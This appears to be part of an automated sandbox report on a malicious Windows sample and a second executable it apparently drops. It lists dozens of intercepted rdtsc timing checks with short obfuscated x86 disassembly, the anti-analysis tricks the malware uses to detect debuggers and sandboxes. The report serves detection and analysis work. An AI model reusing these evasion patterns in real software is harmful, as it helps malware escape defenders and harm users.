                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B07EE9 second address: B07EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B7C7 second address: B0B7DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3778D7B2B6h 0x0000000a pop eax 0x0000000b jbe 00007F3778D7B2BEh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B7DC second address: B0B7E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B7E6 second address: B0B7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B7EA second address: B0B7EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B7EE second address: B0B807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3778D7B2C0h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2E21F second address: B2E23C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C035h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2E8BF second address: B2E8CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F3778D7B2BCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30599 second address: B305B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C038h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34B06 second address: B34B65 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F3778D7B2CBh 0x0000000e pushad 0x0000000f jmp 00007F3778D7B2BDh 0x00000014 jnc 00007F3778D7B2B6h 0x0000001a popad 0x0000001b nop 0x0000001c mov edx, 64C01A0Fh 0x00000021 push dword ptr [ebp+122D1880h] 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F3778D7B2B8h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000019h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov dword ptr [ebp+122D2260h], edx 0x00000047 push 88667657h 0x0000004c push edi 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34B65 second address: B34B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B36585 second address: B36593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F3778D7B2B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B36593 second address: B365A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3778D7C02Dh 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B365A8 second address: B365BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3778D7B2C2h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38052 second address: B3806B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C035h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3806B second address: B38076 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F3778D7B2B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020344 second address: 50203C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3778D7C031h 0x00000009 adc al, FFFFFF96h 0x0000000c jmp 00007F3778D7C031h 0x00000011 popfd 0x00000012 call 00007F3778D7C030h 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F3778D7C031h 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F3778D7C02Ch 0x0000002a sbb ah, 00000018h 0x0000002d jmp 00007F3778D7C02Bh 0x00000032 popfd 0x00000033 movzx ecx, di 0x00000036 popad 0x00000037 pop ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F3778D7C02Eh 0x0000003f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D368 second address: A4D36E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020CFD second address: 5020D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3778D7C02Eh 0x00000009 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FE7A92 second address: FE7A9C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3778D7B2B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FE7A9C second address: FE7AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3778D7C02Dh 0x0000000d rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FE7AB1 second address: FE7AC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FEEACC second address: FEEAD2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FEEAD2 second address: FEEAD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FEED9E second address: FEEDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FF1FE6 second address: FF2008 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3778D7B2B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f add dword ptr [ebp+124508FEh], ebx 0x00000015 push FA651376h 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f pop edx 0x00000020 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FF2008 second address: FF200D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FF20B7 second address: FF20CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007F3778D7B2B8h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FF20CD second address: FF20D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FF20D1 second address: FF20DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FF20DA second address: FF20EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F3778D7C02Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FF20EE second address: FF20F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FF20F2 second address: FF20F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FF20F8 second address: FF2114 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3778D7B2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jng 00007F3778D7B2C2h 0x00000014 jng 00007F3778D7B2BCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FF2114 second address: FF2125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp+04h], eax 0x00000008 jp 00007F3778D7C045h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FF2125 second address: FF2190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7B2C7h 0x00000009 popad 0x0000000a pop eax 0x0000000b jng 00007F3778D7B2B6h 0x00000011 lea ebx, dword ptr [ebp+12456EA5h] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F3778D7B2B8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov esi, dword ptr [ebp+122D2A99h] 0x00000037 xchg eax, ebx 0x00000038 push ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F3778D7B2C3h 0x00000040 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FF2290 second address: FF22AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3778D7C038h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FF23B7 second address: FF23BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FF23BB second address: FF2431 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3778D7C026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b xor dword ptr [esp], 672B02D3h 0x00000012 adc cl, 00000029h 0x00000015 jmp 00007F3778D7C02Bh 0x0000001a push 00000003h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F3778D7C028h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 0000001Dh 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 or dword ptr [ebp+122D26FFh], eax 0x0000003c mov ecx, dword ptr [ebp+122D1A2Ch] 0x00000042 push 00000000h 0x00000044 jbe 00007F3778D7C02Ch 0x0000004a mov edx, dword ptr [ebp+122D2861h] 0x00000050 push 00000003h 0x00000052 adc dl, 00000031h 0x00000055 push 9C75622Dh 0x0000005a jng 00007F3778D7C030h 0x00000060 pushad 0x00000061 push edi 0x00000062 pop edi 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FF2431 second address: FF2476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 5C75622Dh 0x0000000c mov edx, dword ptr [ebp+122D3706h] 0x00000012 lea ebx, dword ptr [ebp+12456EB9h] 0x00000018 jmp 00007F3778D7B2BBh 0x0000001d xchg eax, ebx 0x0000001e je 00007F3778D7B2CAh 0x00000024 push ecx 0x00000025 jmp 00007F3778D7B2C2h 0x0000002a pop ecx 0x0000002b push eax 0x0000002c pushad 0x0000002d pushad 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FF2476 second address: FF247E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 101155A second address: 1011560 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1011560 second address: 101157C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3778D7C036h 0x0000000b rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1011A24 second address: 1011A3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3778D7B2C2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1011BA0 second address: 1011BEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F3778D7C026h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F3778D7C03Dh 0x00000018 ja 00007F3778D7C03Fh 0x0000001e rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1011EA8 second address: 1011EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1011EAC second address: 1011EBE instructions: 0x00000000 rdtsc 0x00000002 je 00007F3778D7C026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F3778D7C032h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1011EBE second address: 1011EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1012074 second address: 1012078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10121D8 second address: 10121DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 101235D second address: 1012398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3778D7C026h 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F3778D7C031h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F3778D7C030h 0x0000001c jbe 00007F3778D7C026h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1012398 second address: 10123A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10123A3 second address: 10123A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1012A34 second address: 1012A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1012A38 second address: 1012A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1012A40 second address: 1012A7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2C6h 0x00000007 push ebx 0x00000008 jmp 00007F3778D7B2C4h 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 ja 00007F3778D7B2DAh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1012A7C second address: 1012A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1012A80 second address: 1012A90 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F3778D7B2B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1012A90 second address: 1012A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1012BD5 second address: 1012BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1012D72 second address: 1012D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1012D76 second address: 1012D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1012D7C second address: 1012D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1015D58 second address: 1015D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 101471F second address: 1014723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1014E35 second address: 1014E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1015F23 second address: 1015F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F3778D7C02Bh 0x00000010 popad 0x00000011 pop ebx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007F3778D7C02Ah 0x0000001b mov eax, dword ptr [eax] 0x0000001d push esi 0x0000001e push edx 0x0000001f jmp 00007F3778D7C035h 0x00000024 pop edx 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d pushad 0x0000002e popad 0x0000002f pop eax 0x00000030 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10160F1 second address: 10160F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10160F5 second address: 10160FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10160FF second address: 1016103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 101CA17 second address: 101CA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 101CA1D second address: 101CA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FE5FA6 second address: FE5FAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: FE5FAA second address: FE5FD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F3778D7B2CDh 0x0000000d jnp 00007F3778D7B2B6h 0x00000013 jmp 00007F3778D7B2C1h 0x00000018 push eax 0x00000019 push edx 0x0000001a jp 00007F3778D7B2B6h 0x00000020 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 101F4A1 second address: 101F4A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 101F4A5 second address: 101F4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jo 00007F3778D7B2B6h 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3778D7B2C5h 0x00000018 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 101FB69 second address: 101FB7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 js 00007F3778D7C034h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 101FC55 second address: 101FC6F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3778D7B2BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007F3778D7B2C4h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 101FC6F second address: 101FC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 101FE71 second address: 101FE7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 101FFF8 second address: 1020008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 je 00007F3778D7C034h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1020008 second address: 102000E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102000E second address: 1020057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push eax 0x00000009 call 00007F3778D7C028h 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 add dword ptr [esp+04h], 00000019h 0x0000001b inc eax 0x0000001c push eax 0x0000001d ret 0x0000001e pop eax 0x0000001f ret 0x00000020 jmp 00007F3778D7C032h 0x00000025 or dword ptr [ebp+12455AFAh], eax 0x0000002b push eax 0x0000002c pushad 0x0000002d je 00007F3778D7C02Ch 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
